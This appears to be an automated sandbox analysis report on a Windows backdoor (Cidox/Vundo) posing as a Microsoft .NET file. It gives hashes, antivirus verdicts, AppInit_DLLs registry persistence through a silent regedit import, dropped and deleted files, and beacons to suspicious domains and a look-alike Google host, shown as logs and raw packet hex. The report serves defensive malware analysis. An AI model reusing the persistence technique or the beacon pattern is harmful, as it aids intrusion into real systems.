Analysis Date | 2014-11-30 18:09:44 |
---|---|
MD5 | c6992e84d0bf7f790628327e6413e462 |
SHA1 | b5a7d2a03641ee64af9061880ef27aee446c187b |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: adf32ccf9922242eaee61c738cd1ae66 sha1: 7d47dc758465eb7516c09359e9eac2f5055a414c size: 27136 | |
Section | .rdata md5: 7a5c509b614766e6ef18351017ab61f7 sha1: 4529a0aec47bb99e3ea92834146f2b2735a7a5ba size: 7680 | |
Section | .data md5: 31789e4f2ccb9bcd6f2b7bf0a1298b49 sha1: 9d1ca1112c71e51599d1293b7d9f4beea028e12a size: 5120 | |
Section | .rsrc md5: 28cbcac1d6eb588a7e4d1081d7ce040f sha1: 17aa345e6b2273527b00d6d276f4355fce4ea93a size: 139776 | |
Timestamp | 2012-12-18 17:04:04 | |
Version | LegalCopyright: © Microsoft Corporation. All rights reserved. InternalName: NETFXSBS10.exe FileVersion: 2.0.50727.42 (RTM.050727-4200) CompanyName: Microsoft Corporation Comments: Flavor=Retail ProductName: Microsoft® .NET Framework ProductVersion: 2.0.50727.42 FileDescription: Microsoft .NET viewer OriginalFilename: NETFXSBS10.exe | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | 2ddf6ac218174d913b020c5b622ad80fcc481af7 | |
IMPhash | ecace9b6a70583493455288bf01f7bbc | |
AV | 360 Safe | Gen:Variant.Symmi.8415 |
AV | Ad-Aware | Gen:Variant.Symmi.8415 |
AV | Alwil (avast) | Crypt-OQY [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Drop.Vundo.voua |
AV | BullGuard | Gen:Variant.Symmi.8415 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | WIN.Trojan.Cidox-1024 |
AV | Dr. Web | Trojan.Inject1.15498 |
AV | Emsisoft | Gen:Variant.Symmi.8415 |
AV | Eset (nod32) | Win32/Kryptik.AQUP |
AV | Fortinet | W32/Kryptik.FAGX!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Symmi.8415 |
AV | Grisoft (avg) | Generic_r.BZR |
AV | Ikarus | Backdoor.Win32.Cidox |
AV | K7 | Backdoor ( 04c547291 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Backdoor.Cidox.WMP |
AV | Mcafee | Vundo-FAGX!C6992E84D0BF |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Symmi.8415 |
AV | Rising | no_virus |
AV | Sophos | no_virus |
AV | Symantec | Backdoor.Trojan |
AV | Trend Micro | no_virus |
AV | VirusBlokAda (vba32) | Malware-Cryptor.SB |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\zylkmei.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | detoxist.com |
Winsock DNS | clickbeta.ru |
Winsock DNS | 91.220.35.154 |
Winsock DNS | veroconma.com |
Winsock DNS | terrans.su |
Winsock DNS | getinball.com |
Winsock DNS | geostepster.com |
Winsock DNS | theloamva.com |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | dentagod.com |
Winsock DNS | denareclick.com |
Winsock DNS | debijonda.com |
Winsock DNS | fescheck.com |
Winsock DNS | liteworns.com |
Winsock DNS | getintsu.com |
Winsock DNS | nshouse1.com |
Winsock DNS | netrovad.com |
Winsock DNS | vengibit.com |
Winsock DNS | tryangets.com |
Winsock DNS | vornedix.com |
Winsock DNS | inzavora.com |
Winsock DNS | getavodes.com |
Winsock DNS | degoog1etag.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\zylkmei.dll\\x00 |
---|
Network Details:
DNS | geostepster.com Type: A 208.73.211.250 |
---|---|
DNS | geostepster.com Type: A 208.73.210.211 |
DNS | geostepster.com Type: A 208.73.211.167 |
DNS | geostepster.com Type: A 208.73.211.244 |
DNS | detoxist.com Type: A 141.8.225.80 |
DNS | debijonda.com Type: A 141.8.225.80 |
DNS | veroconma.com Type: A 74.117.179.241 |
DNS | theloamva.com Type: A 141.8.225.80 |
DNS | vornedix.com Type: A 141.8.225.80 |
DNS | dentagod.com Type: A 141.8.225.80 |
DNS | liteworns.com Type: A 141.8.225.80 |
DNS | vengibit.com Type: A 141.8.225.80 |
DNS | tryangets.com Type: A 141.8.225.80 |
DNS | getintsu.com Type: A 141.8.225.80 |
DNS | getavodes.com Type: A 209.222.14.3 |
DNS | tryatdns.com Type: A 209.222.14.3 |
DNS | fescheck.com Type: A 109.234.109.76 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | degoog1etag.com Type: A |
DNS | getinball.com Type: A |
DNS | netrovad.com Type: A |
DNS | terrans.su Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+hScGIDlQq User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+hScGIDlQq User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjlDKDsPoCXEh User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsKvrSP7OO9B User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsKvrSP7OO9B User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjoSpXNvS7oGU User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjoSpXNvS7oGU User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjkdS0ll7hOJd User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjju/fGzdThMI User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+SZNMtIOIh User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjjAwdG2uTUow User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjuFHVQoCdBuf User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 208.73.211.250:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1034 ➝ 74.117.179.241:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1039 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1040 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1041 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1042 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1043 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1044 ➝ 109.234.109.76:80 |
Flows TCP | 192.168.1.1:1045 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1046 ➝ 91.220.35.154:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6b 2b685363 4749446c 51712048 abjk+hScGIDlQq H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6b 2b685363 4749446c 51712048 abjk+hScGIDlQq H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6c 444b4473 506f4358 45682048 abjlDKDsPoCXEh H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a73 4b767253 50374f4f 39422048 abjsKvrSP7OO9B H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a73 4b767253 50374f4f 39422048 abjsKvrSP7OO9B H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6f 5370584e 7653376f 47552048 abjoSpXNvS7oGU H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6f 5370584e 7653376f 47552048 abjoSpXNvS7oGU H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6b 6453306c 6c37684f 4a642048 abjkdS0ll7hOJd H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a73 4275356a 2b516470 636a2048 abjsBu5j+Qdpcj H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a73 4275356a 2b516470 636a2048 abjsBu5j+Qdpcj H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a73 4275356a 2b516470 636a2048 abjsBu5j+Qdpcj H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 